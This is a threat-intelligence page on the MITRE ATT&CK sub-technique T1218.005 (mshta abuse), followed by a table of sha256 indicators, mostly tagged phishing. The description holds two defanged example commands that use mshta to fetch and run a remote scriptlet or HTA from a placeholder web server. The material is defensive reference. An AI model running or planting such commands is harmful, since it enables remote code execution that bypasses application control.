FORENSIA

ATT&CK · T1218.005 · sub-technique

Mshta

Tactics: stealth

About

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code> They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code> Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.

Corpus indicators tagged with this technique

219 indicators in the corpus carry T1218.005.

IndicatorTypeFamilySevSrc
7c3d0bebd263d3529132f2299de55a7801bf3ff40c833b13838be7a98ea3475esha256phishing802
a9287e3452ab09144120ecdd20ed7365de589d5dcad28dcd8e191742d1ce5744sha256phishing801
a4c8a56070fe6f613e79a14554d0a1dba2f70ce2b93319e72972943cc66edf4asha256phishing801
1b25c3d56fdb195b427a9c3bfc1f0e98e77a15322e8d3fc53a18edcc4891847fsha256phishing802
a8bee6c4a5860b0ae08a984d2a6d62c13d3e91d9514262998924d2e0cef88f7csha256phishing801
f1c3ebe78bd8c38559bf3cfcc9a9fa37d221e31780774a3787e26160a61f5348hash803
23b37d2ebe683cec3b145b6f2234ee728b99228cf3774399fcfad9502daab9a9sha256phishing802
18683bba19695d325372d195634afd2f76b14896ba68225ba51ea5a039f2f76dsha256phishing802
22de84e8f29cba932cf65cf4dc1d333cb8b2e468204f97030712bee32691ac3bsha256phishing802
1aaf59f05bb724d501cc9bcd6642ab8fd7347cf274d46c24719c9dced9b22beasha256phishing802
5272917261d7091a59e00f9d09cd7eb1d3e111115a5b367f79a66d0d7c7b01f4sha256phishing802
a7981dfccd8e4bdc00133dc15b22472c1677d6270826863caa36e7d58ef50de0sha256phishing801
43d597783af656a35184021f5e20686896463a1712f9216e0217a2ca740e3935sha256phishing802
9758e76b601798a30d903bf05052a53df80451e5c156548ce9da828f608b6470sha256801
221a39856b37e3c682f62427f1e6b965b36a2405764689c914672770a01a1fa9sha256801
5ab41cf20315d2ea1385967d588159873a65ef5581a0b78de06c0d8617894194sha256phishing802
60972abf5425c191c81bae117f1dedaea13d39bc52f367d5dff9ad1aa4b9c5casha256phishing802
44a4ac119349f525d877728b53fe38453a516881d577679caf08ab69312a695fsha256phishing802
62a879b0d1c1649cc72b2b6f61a8f6bd888625ce6e8a7aefe0a0461e4f27c525sha256phishing802
50ebf107d522326c9a9db8821fe3263aa5136964faaf5dd183657bbb52725f84sha256phishing802
669002654c264191d4660fbf757860d930175649735f81370b9f1af3658a304csha256phishing802
5115277eabf2d22d49dcef1e155874387d8e783853bd86debf7ff58588aae35dsha256phishing802
107b5aa3c4ef30b9b832e0a10b1efb1dcf433158bc6af8d890d66c0c9ed50d21sha256801
e4ccb2328c06710a7f0254cb6315e1b106396b0ff525f9cf3eada6e85d285c1csha256801
248ded4723e9f5da793e5e42d1ba7c2293dd704718f149b84b3b9b818a1f51dbsha256phishing802
771a47120b935e218322046e838347d722d265b91f1afdef91194a5bec86a97asha256phishing802
7900c2772680523cadc9fe4e07300d45500191ba64ff5b91573531b133840b14sha256phishing802
7aa76237a7686583cc526b9d1a8486a52bd44a448d75ced51e1df4ba29ddb163sha256phishing802
7b297f18ece81e87608e158288cc9c06cb9f4a8f1b2d2256aecf7bba8d7be2absha256phishing802
7d09891e26d56a8bec44c3fe9a5791f3a93e8fa31539951ae6e2c40af83ba42dsha256phishing801

Showing the top 30 by severity of 219.